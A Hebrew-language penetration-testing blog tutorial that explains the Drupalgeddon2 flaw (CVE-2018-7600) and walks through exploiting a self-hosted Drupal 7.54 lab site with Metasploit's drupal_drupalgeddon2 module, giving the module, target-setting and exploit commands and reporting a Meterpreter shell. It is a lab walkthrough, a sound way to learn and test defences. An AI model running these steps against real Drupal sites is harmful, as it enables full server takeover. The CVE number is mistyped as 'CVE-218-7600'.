Home אבטחת מידעPenetration Testing - Offense הסבר וביצוע Drupalgeddon2 על מערכת התוכן Drupal 7.54

הסבר וביצוע Drupalgeddon2 על מערכת התוכן Drupal 7.54

0 comment
נהנתם מהמאמר ? שתפו אותו!

כל הזכויות שמורות לטל בן שושן – Shushan.co.il

הסבר וביצוע Drupalgeddon2 על מערכת התוכן Drupal 7.54


על מנת לבצע את המאמר, יש לעבור תחילה על המאמרים הבאים:
Kali & Metasploit

התקנת Kali 2017.3
הגדרה ראשונית של Kali והוספת Repository
הסבר הגדרה והפעלת Metasploit
פקודות ושימוש ב Metasploit


Drupalgeddon2 התגלה ב28 למרץ 2018 ומספר ה CVE שלו הוא CVE-218-7600 כל גרסאות (שאפרט כאן) של דרופל פגיעות לחולשה הזו, החולשה נותנת לתוקף שליטה מלאה (Meterpreter) על השרת בשם משתמש שהעתיק ויצר את האתר.
החולשה לאותו רגע הפרסום היה תקפה לכלל אתרי הדרופל (כמליוני אתרים ברחבי העולם)

כל גרסאות דרופל – מגרסה 7 עד גרסה 7.58 (לא כולל 7.58)
גם גרסאות 8.3 עד 8.4, 8.4.5 וכל גרסה לפני 8.5.1

במאמר זה אציג כיצד לבצע את החולשה:

דרישות:

  • Kali
  • מערכת Centos \ Ubuntu או כל שרת לינוקס המריץ שירותי LAMP (במאמר זה השתמשתי ב VestaCP)

תחילה נעדכן את Metasploit

sudo apt update; apt install metasploit-framework

כעת נפעיל את Metasploit

sudo msfconsole

הורדתי את Drupal בגרסה 7.54 מהקישור הבא והתקנתי אותו על גבי VestaCP עם הדומיין drupal-tal.com (מוגדר בקובץ Hosts כמובן)

כעת ב Metasploit ניגשתי ל Exploit

use exploit/unix/webapp/drupal_drupalgeddon2

כעת הגדרתי את כתובת האתר

אם האתר בפורמט

www.thissite.com/drupal

אתם חייבים לשנות את ה TargetURI בצורה הזו

set targeturi /drupal

ולשים את הכתובת האתר ב rhost

set rhost drupal-tal.com

אם האתר נמצא ישירות בכתובת הזו הזינו בדיוק כמו בתמונה למטה

כעת Exploit

exploit

מצויין, יש לנו גישה!

מאמרים קשורים

Leave a Comment